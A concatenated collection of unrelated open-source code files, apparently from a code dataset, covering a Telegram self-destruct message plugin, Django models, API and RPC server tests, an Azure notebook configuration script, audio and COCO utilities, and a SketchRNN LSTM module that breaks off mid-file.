<gh_stars>1-10 # For @UniBorg # courtesy <NAME> """Self Destruct Plugin .sd <time in seconds> <text> """ import time from userbot import CMD_HELP from telethon.errors import rpcbaseerrors from userbot.utils import admin_cmd import importlib.util @borg.on(admin_cmd(pattern="sdm", outgoing=True)) async def selfdestruct(destroy): if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"): message = destroy.text counter = int(message[5:7]) text = str(destroy.text[7:]) text = ( text ) await destroy.delete() smsg = await destroy.client.send_message(destroy.chat_id, text) time.sleep(counter) await smsg.delete() @borg.on(admin_cmd(pattern="selfd", outgoing=True )) async def selfdestruct(destroy): if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"): message = destroy.text counter = int(message[7:9]) text = str(destroy.text[9:]) text = ( text + "\n\n`This message shall be self-destructed in " + str(counter) + " seconds`" ) await destroy.delete() smsg = await destroy.client.send_message(destroy.chat_id, text) time.sleep(counter) await smsg.delete() CMD_HELP.update({ "selfdestruct": ".sdm number | [text]\ \nUsage: self destruct this message in number seconds \ \n\n.self number | [text]\ \nUsage:self destruct this message in number seconds with showing that it will destruct. \ " })
2.21875
2
snippets/basic_render_template_class.py
OSAMAMOHAMED1234/python_projects
0
5567
<reponame>OSAMAMOHAMED1234/python_projects import os class Template: template_name = '' context = None def __init__(self, template_name='', context=None, *args, **kwargs): self.template_name = template_name self.context = context def get_template(self): template_path = os.path.join(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates'), self.template_name) if not os.path.exists(template_path): raise Exception(f'This path does not exist : {template_path}') template_string = '' with open(template_path, 'r') as f: template_string = f.read() return template_string def render(self, context=None): render_ctx = context if self.context != None: render_ctx = self.context if not isinstance(render_ctx, dict): render_ctx = {} template_string = self.get_template() return template_string.format(**render_ctx) obj = Template(template_name='test.html', context={'name': 'OSAMA'}) print(obj.render()) obj.context= None print(obj.render(context={'name': 'os'})) obj2 = Template(template_name='test.html') print(obj2.render(context={'name': 'os'}))
3.078125
3
level_one/strings.py
jameskzhao/python36
0
5568
<reponame>jameskzhao/python36 #Basics a = "hello" a += " I'm a dog" print(a) print(len(a)) print(a[1:]) #Output: ello I'm a dog print(a[:5]) #Output: hello(index 5 is not included) print(a[2:5])#Output: llo(index 2 is included) print(a[::2])#Step size #string is immutable so you can't assign a[1]= b x = a.upper() print(x) x = a.capitalize() print(x) x = a.split('e') print(x) x = a.split() #splits the string by space print(x) x = a.strip() #removes any whitespace from beginning or the end print(x) x = a.replace('l','xxx') print(x) x = "Insert another string here: {}".format('insert me!') x = "Item One: {} Item Two: {}".format('dog', 'cat') print(x) x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat') print(x) #command-line string input print("Enter your name:") x = input() print("Hello: {}".format(x))
4.09375
4
tests/test_01_accept_time_get_headers.py
glushkovvv/test_2gis
0
5569
<filename>tests/test_01_accept_time_get_headers.py # -*- coding: utf-8 -*- """ test_01_accept_time_get_headers ~~~~~~~~~~~~~~ The 2GIS API Test Check time get headers :author: <NAME> :copyright: Copyright 2019, The2GIS API Test" :license: MIT :version: 1.0.0 :maintainer: <NAME> :email: <EMAIL> :status: Development """ import pytest import allure from tools.api_responses import get_response @allure.epic("Поизитивные тесты API") @allure.suite("Позитивное тестирование время ответов") @allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке") @pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 5}, {"country_code": "ru", "page": 1, "page_size": 5}, {"q": "ОРСК"}]) def test_01_time_response_for_valid_request(setup_option, json_params): """ Проверяем время ответов сервера при валидных запросах :param setup_option: Установочные параметры :type setup_option: dict :param json_params: Параметры GET запроса :type json_params: dict :return: """ api_url = setup_option['site_url'] request_params = json_params api_response = get_response(api_url, request_params) testing_message = (f" EndPoint: {api_response.url}\n" f" Status: {api_response.status_code}\n" f" Headers: {api_response.headers}\n" f" Content: {api_response.content}") check = api_response.elapsed.total_seconds() <= 0.2 assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.2 сек\r\n""" + testing_message @allure.epic("Смок тесты API") @allure.suite("Позитивное тестирование время ответов") @allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке") @pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 2}, {"country_code": "tz", "page": 1, "page_size": 5}, {"q": "ОР"}]) def test_01_time_response_for_invalid_request(setup_option, json_params): """ Проверяем время ответов сервера при невалидных запросах :param setup_option: Установочные параметры :type setup_option: dict :param json_params: Параметры GET запроса :type json_params: dict :return: """ api_url = setup_option['site_url'] request_params = json_params api_response = get_response(api_url, request_params) testing_message = (f" EndPoint: {api_response.url}\n" f" Status: {api_response.status_code}\n" f" Headers: {api_response.headers}\n" f" Content: {api_response.content}") check = api_response.elapsed.total_seconds() <= 0.5 assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.5 сек\r\n""" + testing_message
2.0625
2
transformers/string/strlen_transformer.py
ucds-sg/h2oai
0
5570
<gh_stars>0 """Returns the string length of categorical values""" from h2oaicore.transformer_utils import CustomTransformer import datatable as dt import numpy as np class MyStrLenEncoderTransformer(CustomTransformer): @staticmethod def get_default_properties(): return dict(col_type="any", min_cols=1, max_cols=1, relative_importance=1) def fit_transform(self, X: dt.Frame, y: np.array = None): return self.transform(X) def transform(self, X: dt.Frame): return X.to_pandas().astype(str).iloc[:, 0].str.len()
2.953125
3
geometry/eolearn/geometry/__init__.py
eerzin/eo-learn
1
5571
<filename>geometry/eolearn/geometry/__init__.py """ Subpackage containing EOTasks for geometrical transformations """ from .utilities import ErosionTask, VectorToRaster, RasterToVector from .sampling import PointSamplingTask, PointSampler, PointRasterSampler __version__ = '0.4.2'
1.210938
1
api/models/users.py
felipebarraza6/startup_comedy
0
5572
<reponame>felipebarraza6/startup_comedy """User Model.""" # Django from django.db import models from django.contrib.auth.models import AbstractUser # Utilities from .utils import ApiModel class User(ApiModel, AbstractUser): email = models.EmailField( 'email', unique = True, ) USERNAME_FIELD = 'email' REQUIRED_FIELDS = ['username', 'first_name', 'last_name'] is_student = models.BooleanField(default=False) class Meta: verbose_name='Usuario' verbose_name_plural='Usuarios' def __str__(self): return self.username def get_short_name(self): return self.username class ProfileUser(ApiModel): user = models.OneToOneField(User, on_delete=models.CASCADE) approved_courses = models.ManyToManyField('api.ResultContest', related_name='user_aproved_courses', blank=True, null=True) tests_performed = models.ManyToManyField('api.ResultTest', related_name='user_result_test', blank=True) class Meta: verbose_name = 'Usuario - Perfil' verbose_name_plural = 'Usuarios - Perfiles' def __str__(self): return str(self.user)
2.5
2
tests/test_server.py
m-bo-one/ethereumd-proxy
21
5573
<reponame>m-bo-one/ethereumd-proxy from collections import namedtuple import json from asynctest.mock import patch import pytest from ethereumd.server import RPCServer from ethereumd.proxy import EthereumProxy from aioethereum.errors import BadResponseError from .base import BaseTestRunner Request = namedtuple('Request', ['json']) class TestServer(BaseTestRunner): run_with_node = True async def init_server(self, loop): server = RPCServer() with patch('ethereumd.poller.Poller.poll'): await server.before_server_start()(None, loop) return server @pytest.mark.asyncio async def test_server_handler_index_success_call(self, event_loop): server = await self.init_server(event_loop) data = { 'jsonrpc': '2.0', 'method': 'getblockcount', 'params': [], 'id': 'test', } request = Request(json=data) response = await server.handler_index(request) parsed = json.loads(response.body) assert parsed['error'] is None assert isinstance(parsed['result'], int) @pytest.mark.asyncio async def test_server_handler_index_invalid_rpc_data(self, event_loop): server = await self.init_server(event_loop) data = { 'jsonrpc': '2.0', 'method': 'getblockcount', 'id': 'test', } request = Request(json=data) response = await server.handler_index(request) parsed = json.loads(response.body) assert parsed['error']['code'] == -32602 assert parsed['error']['message'] == 'Invalid rpc 2.0 structure' assert parsed['result'] is None @pytest.mark.asyncio async def test_server_handler_index_attr_error_call(self, event_loop): server = await self.init_server(event_loop) data = { 'jsonrpc': '2.0', 'method': 'getblockcount', 'params': [], 'id': 'test', } request = Request(json=data) def _raise_error(): raise AttributeError('bla bla method not found') with patch.object(EthereumProxy, 'getblockcount', side_effect=_raise_error): response = await server.handler_index(request) parsed = json.loads(response.body) assert parsed['error']['code'] == -32601 assert parsed['error']['message'] == 'Method not found' assert parsed['result'] is None @pytest.mark.asyncio async def test_server_handler_index_type_error_call(self, event_loop): server = await self.init_server(event_loop) data = { 'jsonrpc': '2.0', 'method': 'getblockcount', 'params': [], 'id': 'test', } request = Request(json=data) def _raise_error(): raise TypeError('test') with patch.object(EthereumProxy, 'getblockcount', side_effect=_raise_error): response = await server.handler_index(request) parsed = json.loads(response.body) assert parsed['error']['code'] == -1 assert parsed['error']['message'] == 'test' assert parsed['result'] is None @pytest.mark.asyncio async def test_server_handler_index_bad_response_call(self, event_loop): server = await self.init_server(event_loop) data = { 'jsonrpc': '2.0', 'method': 'getblockcount', 'params': [], 'id': 'test', } request = Request(json=data) def _raise_error(): raise BadResponseError('test', code=-99999999) with patch.object(EthereumProxy, 'getblockcount', side_effect=_raise_error): response = await server.handler_index(request) parsed = json.loads(response.body) assert parsed['error']['code'] == -99999999 assert parsed['error']['message'] == 'test' assert parsed['result'] is None
2.078125
2
neorl/rl/baselines/readme.py
evdcush/neorl
20
5574
<filename>neorl/rl/baselines/readme.py # This file is part of NEORL. # Copyright (c) 2021 Exelon Corporation and MIT Nuclear Science and Engineering # NEORL is free software: you can redistribute it and/or modify # it under the terms of the MIT LICENSE # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. #NEORL team thanks stable-baselines as we have used their own implementation of different RL #algorathims to establish NEORL optimizers. We have used the files in this open-source repo: #https://github.com/hill-a/stable-baselines
1.296875
1
Compare.py
sushantPatrikar/WaveCompartor
3
5575
from scipy.io import wavfile import numpy as np import pingouin as pg import pandas as pd _,data = wavfile.read('wav//ed//mp3baked.wav') _,data1 = wavfile.read('wav//ing//ingeating.wav') i= data.shape[0]-1 j = data1.shape[0]-1 index_1 = -1 index_2 = -1 try: data.shape[1] except IndexError: data = data.reshape(data.shape[0],1) try: data1.shape[1] except IndexError: data1 = data1.reshape(data1.shape[0],1) while True: if data[i,0] !=0 and index_1==-1: index_1 = i pass if data1[j,0] !=0 and index_2==-1: index_2 = j pass if index_1!=-1 and index_2!=-1: break i-=1 j-=1 data = data[-index_1:,:] data1 = data1[-index_2:,:] data = data[-2000:,:] data1= data1[-2000:,:] x =pg.corr(x=data[:,0],y=data1[:,0]) print(x) # print(data.tostring()) # print(data1.tostring()) # data = data[:,:] # data1 = data1[:,:] # data = data.reshape(data.shape[0],1) # data1 = data1.reshape(data1.shape[0],1) # data = data[-10000:,:] # data1 = data1[-10000:,:] # print(data1.shape[1]) # df = pd.DataFrame(data,data1) # print(df.head()) # print(data1.shape) # data = data[-5000:,:] # data1 = data1[-5000:,:] # # # x =pg.corr(x=data[:,0],y=data1[:,0]) # print(x)
2.421875
2
tests/comments/test_only_block_comment.py
sco1/pylox
2
5576
<reponame>sco1/pylox<filename>tests/comments/test_only_block_comment.py<gh_stars>1-10 from textwrap import dedent import pytest from pylox.lox import Lox TEST_SRC = dedent( """\ /* This is a multiline block comment */ """ ) EXPECTED_STDOUTS: list[str] = [] def test_block_comment_at_eof(capsys: pytest.CaptureFixture) -> None: interpreter = Lox() interpreter.run(TEST_SRC) assert not interpreter.had_error assert not interpreter.had_runtime_error all_out = capsys.readouterr().out.splitlines() assert all_out == EXPECTED_STDOUTS
2.46875
2
mlbase/lazy.py
n-kats/mlbase
0
5577
<reponame>n-kats/mlbase<filename>mlbase/lazy.py<gh_stars>0 from mlbase.utils.misc import lazy tensorflow = lazy("tensorflow") numpy = lazy("numpy") gensim = lazy("gensim")
1.4375
1
setup.py
sturmianseq/observed
33
5578
import re import setuptools README_FILENAME = "README.md" VERSION_FILENAME = "observed.py" VERSION_RE = r"^__version__ = ['\"]([^'\"]*)['\"]" # Get version information with open(VERSION_FILENAME, "r") as version_file: mo = re.search(VERSION_RE, version_file.read(), re.M) if mo: version = mo.group(1) else: msg = "Unable to find version string in %s." % (version_file,) raise RuntimeError(msg) # Get description information with open(README_FILENAME, "r") as description_file: long_description = description_file.read() setuptools.setup( name="observed", version=version, author="<NAME>", author_email="<EMAIL>", description="Observer pattern for functions and bound methods", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/DanielSank/observed", py_modules=["observed"], classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], )
1.890625
2
src/coco.py
catalyst-team/detector
15
5579
import os import json import numpy as np import pickle from typing import Any from pycocotools.coco import COCO from torch.utils.data import Dataset class DetectionMSCOCODataset(Dataset): def __init__(self, annotation_file: str, image_dir: str): self._annotation_file = annotation_file self._image_dir = image_dir self._cache_file = self._annotation_file + ".cache" self._coco = COCO(self._annotation_file) self._img_ids = self._coco.getImgIds() self._cat_ids = self._coco.getCatIds() self._ann_ids = self._coco.getAnnIds() self._data = "coco" self._classes = { ind: cat_id for ind, cat_id in enumerate(self._cat_ids) } self._coco_to_class_map = { value: key for key, value in self._classes.items() } self._load_data() self._db_inds = np.arange(len(self._image_names)) self._load_coco_data() def _load_data(self): print("loading from cache file: {}".format(self._cache_file)) if not os.path.exists(self._cache_file): print("No cache file found...") self._extract_data() with open(self._cache_file, "wb") as f: pickle.dump([self._detections, self._image_names], f) print("Cache file created") else: with open(self._cache_file, "rb") as f: self._detections, self._image_names = pickle.load(f) def _load_coco_data(self): with open(self._annotation_file, "r") as f: data = json.load(f) coco_ids = self._coco.getImgIds() eval_ids = { self._coco.loadImgs(coco_id)[0]["file_name"]: coco_id for coco_id in coco_ids } self._coco_categories = data["categories"] self._coco_eval_ids = eval_ids def class_name(self, cid): cat_id = self._classes[cid] cat = self._coco.loadCats([cat_id])[0] return cat["name"] def _extract_data(self): self._image_names = [ self._coco.loadImgs(img_id)[0]["file_name"] for img_id in self._img_ids ] self._detections = {} for ind, (coco_image_id, image_name) in enumerate(zip(self._img_ids, self._image_names)): image = self._coco.loadImgs(coco_image_id)[0] bboxes = [] categories = [] for cat_id in self._cat_ids: annotation_ids = self._coco.getAnnIds(imgIds=image["id"], catIds=cat_id) annotations = self._coco.loadAnns(annotation_ids) category = self._coco_to_class_map[cat_id] for annotation in annotations: bbox = np.array(annotation["bbox"]) bbox[[2, 3]] += bbox[[0, 1]] bboxes.append(bbox) categories.append(category) self._detections[image_name] = [{ 'bbox': bbox.astype(np.float32), 'category_id': category, 'category_name': self.class_name(category) } for bbox, category in zip(bboxes, categories)] def __getitem__(self, ind: int) -> Any: image_name = self._image_names[ind] return { 'image_name': os.path.join(self._image_dir, image_name), 'detections': self._detections[image_name] } def __len__(self) -> int: return len(self._img_ids) def get_num_classes(self) -> int: return len(self._cat_ids)
2.453125
2
UVa 10105 polynomial coefficients/sample/main.py
tadvi/uva
1
5580
import sys import operator sys.stdin = open('input.txt') fact = [1, 1] for i in range(2, 15): fact.append(fact[-1] * i) while True: try: n, k = map(int, raw_input().split()) coef = map(int, raw_input().split()) except: break print fact[n] / reduce(operator.mul, [fact[c] for c in coef])
2.84375
3
pynotes/note/models.py
wallaceleonel/Flash-Cards
2
5581
<gh_stars>1-10 from django.contrib.auth.models import User from django.db import models from django.urls import reverse # Create your models here. class Post(models.Model): title = models.CharField(max_length=255) slug = models.SlugField(max_length=255,unique=True) #meusite.com/blog;introducao-ao-django author = models.ForeignKey(User, on_delete=models.CASCADE) body = models.TextField() created = models.DateTimeField(auto_now_add=True) updated = models.DateTimeField(auto_now=True) class Meta: ordering = ("-created",) def __str__(self): return self.title def get_absolute_url(self): return reverse("note:detail", kwargs={"slug": self.slug})
2.53125
3
infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py
DmytroLiaskovskyi/incubator-dlab
0
5582
#!/usr/bin/python # ***************************************************************************** # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # # ****************************************************************************** import logging import json import sys from dlab.fab import * from dlab.meta_lib import * from dlab.actions_lib import * import os import uuid if __name__ == "__main__": local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'], os.environ['request_id']) local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s', level=logging.DEBUG, filename=local_log_filepath) try: # generating variables dictionary print('Generating infrastructure names and tags') notebook_config = dict() try: notebook_config['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-') except: notebook_config['exploratory_name'] = '' try: notebook_config['computational_name'] = os.environ['computational_name'].replace('_', '-') except: notebook_config['computational_name'] = '' notebook_config['service_base_name'] = os.environ['conf_service_base_name'] notebook_config['resource_group_name'] = os.environ['azure_resource_group_name'] notebook_config['region'] = os.environ['azure_region'] notebook_config['user_name'] = os.environ['edge_user_name'].replace('_', '-') notebook_config['project_name'] = os.environ['project_name'].replace('_', '-') notebook_config['project_tag'] = os.environ['project_name'].replace('_', '-') notebook_config['endpoint_tag'] = os.environ['endpoint_name'].replace('_', '-') notebook_config['cluster_name'] = notebook_config['service_base_name'] + '-' + notebook_config['project_name'] + \ '-de-' + notebook_config['exploratory_name'] + '-' + \ notebook_config['computational_name'] notebook_config['master_node_name'] = notebook_config['cluster_name'] + '-m' notebook_config['slave_node_name'] = notebook_config['cluster_name'] + '-s' notebook_config['notebook_name'] = os.environ['notebook_instance_name'] notebook_config['key_path'] = os.environ['conf_key_dir'] + '/' + os.environ['conf_key_name'] + '.pem' notebook_config['dlab_ssh_user'] = os.environ['conf_os_user'] notebook_config['instance_count'] = int(os.environ['dataengine_instance_count']) try: notebook_config['spark_master_ip'] = AzureMeta().get_private_ip_address( notebook_config['resource_group_name'], notebook_config['master_node_name']) notebook_config['notebook_ip'] = AzureMeta().get_private_ip_address( notebook_config['resource_group_name'], notebook_config['notebook_name']) except Exception as err: print('Error: {0}'.format(err)) sys.exit(1) notebook_config['spark_master_url'] = 'spark://{}:7077'.format(notebook_config['spark_master_ip']) except Exception as err: for i in range(notebook_config['instance_count'] - 1): slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1) AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name) AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name']) append_result("Failed to generate infrastructure names", str(err)) sys.exit(1) try: logging.info('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]') print('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]') params = "--cluster_name {0} --spark_version {1} --hadoop_version {2} --os_user {3} --spark_master {4}" \ " --keyfile {5} --notebook_ip {6} --datalake_enabled {7} --spark_master_ip {8}".\ format(notebook_config['cluster_name'], os.environ['notebook_spark_version'], os.environ['notebook_hadoop_version'], notebook_config['dlab_ssh_user'], notebook_config['spark_master_url'], notebook_config['key_path'], notebook_config['notebook_ip'], os.environ['azure_datalake_enable'], notebook_config['spark_master_ip']) try: local("~/scripts/{}_{}.py {}".format(os.environ['application'], 'install_dataengine_kernels', params)) except: traceback.print_exc() raise Exception except Exception as err: print('Error: {0}'.format(err)) for i in range(notebook_config['instance_count'] - 1): slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1) AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name) AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name']) append_result("Failed installing Dataengine kernels.", str(err)) sys.exit(1) try: logging.info('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]') print('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]') params = "--hostname {0} " \ "--keyfile {1} " \ "--os_user {2} " \ "--cluster_name {3} " \ .format(notebook_config['notebook_ip'], notebook_config['key_path'], notebook_config['dlab_ssh_user'], notebook_config['cluster_name']) try: local("~/scripts/{0}.py {1}".format('common_configure_spark', params)) except: traceback.print_exc() raise Exception except Exception as err: print('Error: {0}'.format(err)) for i in range(notebook_config['instance_count'] - 1): slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1) AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name) AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name']) append_result("Failed to configure Spark.", str(err)) sys.exit(1) try: with open("/root/result.json", 'w') as result: res = {"notebook_name": notebook_config['notebook_name'], "Action": "Configure notebook server"} print(json.dumps(res)) result.write(json.dumps(res)) except: print("Failed writing results.") sys.exit(0)
1.554688
2
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
81
5583
<reponame>ruohoruotsi/pyACA<filename>pyACA/ToolFreq2Bark.py<gh_stars>10-100 # -*- coding: utf-8 -*- """ helper function: convert Hz to Bark scale Args: fInHz: The frequency to be converted, can be scalar or vector cModel: The name of the model ('Schroeder' [default], 'Terhardt', 'Zwicker', 'Traunmuller') Returns: Bark values of the input dimension """ import numpy as np import math def ToolFreq2Bark(fInHz, cModel = 'Schroeder'): def acaSchroeder_scalar(f): return 7 * math.asinh(f/650) def acaTerhardt_scalar(f): return 13.3 * math.atan(0.75 * f/1000) def acaZwicker_scalar(f): return 13 * math.atan(0.76 * f/1000) + 3.5 * math.atan(f/7500) def acaTraunmuller_scalar(f): return 26.81/(1+1960./f) - 0.53 f = np.asarray(fInHz) if f.ndim == 0: if cModel == 'Terhardt': return acaTerhardt_scalar(f) elif cModel == 'Zwicker': return acaZwicker_scalar(f) elif cModel == 'Traunmuller': return acaTraunmuller_scalar(f) else: return acaSchroeder_scalar(f) fBark = np.zeros(f.shape) if cModel == 'Terhardt': for k,fi in enumerate(f): fBark[k] = acaTerhardt_scalar(fi) elif cModel == 'Zwicker': for k,fi in enumerate(f): fBark[k] = acaZwicker_scalar(fi) elif cModel == 'Traunmuller': for k,fi in enumerate(f): fBark[k] = acaTraunmuller_scalar(fi) else: for k,fi in enumerate(f): fBark[k] = acaSchroeder_scalar(fi) return (fBark)
2.578125
3
magenta/models/sketch_rnn/rnn.py
laurens-in/magenta
1
5584
<reponame>laurens-in/magenta # Copyright 2019 The Magenta Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """SketchRNN RNN definition.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow.compat.v1 as tf from tensorflow.contrib import rnn as contrib_rnn def orthogonal(shape): """Orthogonal initilaizer.""" flat_shape = (shape[0], np.prod(shape[1:])) a = np.random.normal(0.0, 1.0, flat_shape) u, _, v = np.linalg.svd(a, full_matrices=False) q = u if u.shape == flat_shape else v return q.reshape(shape) def orthogonal_initializer(scale=1.0): """Orthogonal initializer.""" def _initializer(shape, dtype=tf.float32, partition_info=None): # pylint: disable=unused-argument return tf.constant(orthogonal(shape) * scale, dtype) return _initializer def lstm_ortho_initializer(scale=1.0): """LSTM orthogonal initializer.""" def _initializer(shape, dtype=tf.float32, partition_info=None): # pylint: disable=unused-argument size_x = shape[0] size_h = shape[1] // 4 # assumes lstm. t = np.zeros(shape) t[:, :size_h] = orthogonal([size_x, size_h]) * scale t[:, size_h:size_h * 2] = orthogonal([size_x, size_h]) * scale t[:, size_h * 2:size_h * 3] = orthogonal([size_x, size_h]) * scale t[:, size_h * 3:] = orthogonal([size_x, size_h]) * scale return tf.constant(t, dtype) return _initializer class LSTMCell(contrib_rnn.RNNCell): """Vanilla LSTM cell. Uses ortho initializer, and also recurrent dropout without memory loss (https://arxiv.org/abs/1603.05118) """ def __init__(self, num_units, forget_bias=1.0, use_recurrent_dropout=False, dropout_keep_prob=0.9): self.num_units = num_units self.forget_bias = forget_bias self.use_recurrent_dropout = use_recurrent_dropout self.dropout_keep_prob = dropout_keep_prob @property def state_size(self): return 2 * self.num_units @property def output_size(self): return self.num_units def get_output(self, state): unused_c, h = tf.split(state, 2, 1) return h def __call__(self, x, state, scope=None): with tf.variable_scope(scope or type(self).__name__): c, h = tf.split(state, 2, 1) x_size = x.get_shape().as_list()[1] w_init = None # uniform h_init = lstm_ortho_initializer(1.0) # Keep W_xh and W_hh separate here as well to use different init methods. w_xh = tf.get_variable( 'W_xh', [x_size, 4 * self.num_units], initializer=w_init) w_hh = tf.get_variable( 'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init) bias = tf.get_variable( 'bias', [4 * self.num_units], initializer=tf.constant_initializer(0.0)) concat = tf.concat([x, h], 1) w_full = tf.concat([w_xh, w_hh], 0) hidden = tf.matmul(concat, w_full) + bias i, j, f, o = tf.split(hidden, 4, 1) if self.use_recurrent_dropout: g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob) else: g = tf.tanh(j) new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g new_h = tf.tanh(new_c) * tf.sigmoid(o) return new_h, tf.concat([new_c, new_h], 1) # fuk tuples. def layer_norm_all(h, batch_size, base, num_units, scope='layer_norm', reuse=False, gamma_start=1.0, epsilon=1e-3, use_bias=True): """Layer Norm (faster version, but not using defun).""" # Performs layer norm on multiple base at once (ie, i, g, j, o for lstm) # Reshapes h in to perform layer norm in parallel h_reshape = tf.reshape(h, [batch_size, base, num_units]) mean = tf.reduce_mean(h_reshape, [2], keep_dims=True) var = tf.reduce_mean(tf.square(h_reshape - mean), [2], keep_dims=True) epsilon = tf.constant(epsilon) rstd = tf.rsqrt(var + epsilon) h_reshape = (h_reshape - mean) * rstd # reshape back to original h = tf.reshape(h_reshape, [batch_size, base * num_units]) with tf.variable_scope(scope): if reuse: tf.get_variable_scope().reuse_variables() gamma = tf.get_variable( 'ln_gamma', [4 * num_units], initializer=tf.constant_initializer(gamma_start)) if use_bias: beta = tf.get_variable( 'ln_beta', [4 * num_units], initializer=tf.constant_initializer(0.0)) if use_bias: return gamma * h + beta return gamma * h def layer_norm(x, num_units, scope='layer_norm', reuse=False, gamma_start=1.0, epsilon=1e-3, use_bias=True): """Calculate layer norm.""" axes = [1] mean = tf.reduce_mean(x, axes, keep_dims=True) x_shifted = x - mean var = tf.reduce_mean(tf.square(x_shifted), axes, keep_dims=True) inv_std = tf.rsqrt(var + epsilon) with tf.variable_scope(scope): if reuse: tf.get_variable_scope().reuse_variables() gamma = tf.get_variable( 'ln_gamma', [num_units], initializer=tf.constant_initializer(gamma_start)) if use_bias: beta = tf.get_variable( 'ln_beta', [num_units], initializer=tf.constant_initializer(0.0)) output = gamma * (x_shifted) * inv_std if use_bias: output += beta return output def raw_layer_norm(x, epsilon=1e-3): axes = [1] mean = tf.reduce_mean(x, axes, keep_dims=True) std = tf.sqrt( tf.reduce_mean(tf.square(x - mean), axes, keep_dims=True) + epsilon) output = (x - mean) / (std) return output def super_linear(x, output_size, scope=None, reuse=False, init_w='ortho', weight_start=0.0, use_bias=True, bias_start=0.0, input_size=None): """Performs linear operation. Uses ortho init defined earlier.""" shape = x.get_shape().as_list() with tf.variable_scope(scope or 'linear'): if reuse: tf.get_variable_scope().reuse_variables() w_init = None # uniform if input_size is None: x_size = shape[1] else: x_size = input_size if init_w == 'zeros': w_init = tf.constant_initializer(0.0) elif init_w == 'constant': w_init = tf.constant_initializer(weight_start) elif init_w == 'gaussian': w_init = tf.random_normal_initializer(stddev=weight_start) elif init_w == 'ortho': w_init = lstm_ortho_initializer(1.0) w = tf.get_variable( 'super_linear_w', [x_size, output_size], tf.float32, initializer=w_init) if use_bias: b = tf.get_variable( 'super_linear_b', [output_size], tf.float32, initializer=tf.constant_initializer(bias_start)) return tf.matmul(x, w) + b return tf.matmul(x, w) class LayerNormLSTMCell(contrib_rnn.RNNCell): """Layer-Norm, with Ortho Init. and Recurrent Dropout without Memory Loss. https://arxiv.org/abs/1607.06450 - Layer Norm https://arxiv.org/abs/1603.05118 - Recurrent Dropout without Memory Loss """ def __init__(self, num_units, forget_bias=1.0, use_recurrent_dropout=False, dropout_keep_prob=0.90): """Initialize the Layer Norm LSTM cell. Args: num_units: int, The number of units in the LSTM cell. forget_bias: float, The bias added to forget gates (default 1.0). use_recurrent_dropout: Whether to use Recurrent Dropout (default False) dropout_keep_prob: float, dropout keep probability (default 0.90) """ self.num_units = num_units self.forget_bias = forget_bias self.use_recurrent_dropout = use_recurrent_dropout self.dropout_keep_prob = dropout_keep_prob @property def input_size(self): return self.num_units @property def output_size(self): return self.num_units @property def state_size(self): return 2 * self.num_units def get_output(self, state): h, unused_c = tf.split(state, 2, 1) return h def __call__(self, x, state, timestep=0, scope=None): with tf.variable_scope(scope or type(self).__name__): h, c = tf.split(state, 2, 1) h_size = self.num_units x_size = x.get_shape().as_list()[1] batch_size = x.get_shape().as_list()[0] w_init = None # uniform h_init = lstm_ortho_initializer(1.0) w_xh = 